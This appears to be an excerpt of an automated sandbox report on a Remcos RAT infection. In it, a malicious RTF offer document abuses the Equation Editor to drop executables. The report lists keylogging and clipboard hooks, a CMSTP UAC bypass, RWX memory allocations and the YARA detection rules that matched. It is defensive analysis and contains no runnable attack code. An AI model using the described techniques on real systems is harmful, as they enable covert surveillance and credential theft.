                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                  Source: plugman23456.scrString found in binary or memory: https://login.yahoo.com/config/login
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: plugman23456.scr, 00000015.00000002.393286872.0000000002509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: EQNEDT32.EXE, 00000002.00000003.363803230.000000000033C000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.363803230.0000000000378000.00000004.00000020.00020000.00000000.sdmp, plug[1].scr.2.dr, znlzneAxBVd.exe.5.dr, plugman23456.scr.2.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: plugman23456.scr, plugman23456.scr, 00000017.00000002.388088314.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: plugman23456.scrString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvEBA7.tmp.21.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000 25_2_0040A2B8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\plugman23456.scr
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 21_2_0041183A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 21_2_0040987A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 21_2_004098E2
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 22_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 22_2_00406DFC
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 22_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 22_2_00406E9F
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 23_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 23_2_004068B5
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 23_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 23_2_004072B5
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 25_2_004168C1
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard, 25_2_0040B70E
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 25_2_0040A3E0

                  E-Banking Fraud

                  Source: Yara match File source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: plugman23456.scr PID: 3704, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR
                  Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  System Summary

                  Source: Offer ZI-0428.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Roaming\plugman23456.scr
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Process Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00401806 NtdllDefWindowProc_W
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_004018C0 NtdllDefWindowProc_W
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_004016FD NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_004017B7 NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_00402CAC NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_00402D66 NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0030F954
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_0031418D
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 5_2_001B04D4
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 5_2_001BE120
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 5_2_001B1169
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 5_2_001BE558
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 5_2_001BD893
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 5_2_001BEAA0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 5_2_001BDCE8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 12_2_10017194
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 12_2_1000B5C1
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 15_2_001704D4
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 15_2_0017E120
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 15_2_00171169
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 15_2_0017E558
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 15_2_0017E548
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 15_2_0017D892
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 15_2_0017EAA0
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 15_2_0017DCE8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0044B040
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0043610D
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00447310
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0044A490
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0040755A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0043C560
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0044B610
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0044D6C0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_004476F0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0044B870
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0044081D
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00414957
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_004079EE
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00407AEB
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0044AA80
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00412AA9
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00404B74
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00404B03
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_0044BBD8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00404BE5
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00404C76
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00415CFE
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00416D72
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00446D30
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00446D8B
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 21_2_00406E8F
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_00405038
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_0041208C
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_004050A9
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_0040511A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_0043C13A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_004051AB
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_00449300
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_0040D322
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_0044A4F0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_0043A5AB
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_00413631
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_00446690
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_0044A730
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_004398D8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_004498E0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_0044A886
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_0043DA09
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_00438D5E
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_00449ED0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_0041FE83
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 22_2_00430F54
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_004050C2
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_004014AB
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_00405133
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_004051A4
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_00401246
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_0040CA46
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_00405235
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_004032C8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_00401689
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: 23_2_00402F60
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_0043E0CC
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_0041F0FA
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00454159
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00438168
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_004461F0
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_0043E2FB
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_0045332B
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_0042739D
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_004374E6
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_0043E558
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00438770
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_004378FE
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00433946
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_0044D9C9
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00427A46
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_0041DB62
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00427BAF
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00437D33
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00435E5E
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00426E0E
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_0043DE9D
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00413FCA
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: 25_2_00436FEA
                  Source: tmpF0B6.tmp.5.dr, OLE indicator, VBA macros: true
                  Source: tmpE15.tmp.15.dr, OLE indicator, VBA macros: true
                  Source: tmpF0B6.tmp.5.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: tmpE15.tmp.15.dr, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: String function: 00434E10 appears 54 times
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: String function: 00402093 appears 50 times
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: String function: 00434770 appears 41 times
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe, Code function: String function: 00401E65 appears 34 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: String function: 004169A7 appears 87 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: String function: 0044DB70 appears 41 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: String function: 004165FF appears 35 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: String function: 00422297 appears 42 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: String function: 00444B5A appears 37 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: String function: 00413025 appears 79 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr, Code function: String function: 00416760 appears 69 times
                  Source: Offer ZI-0428.doc, type: SAMPLE, Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
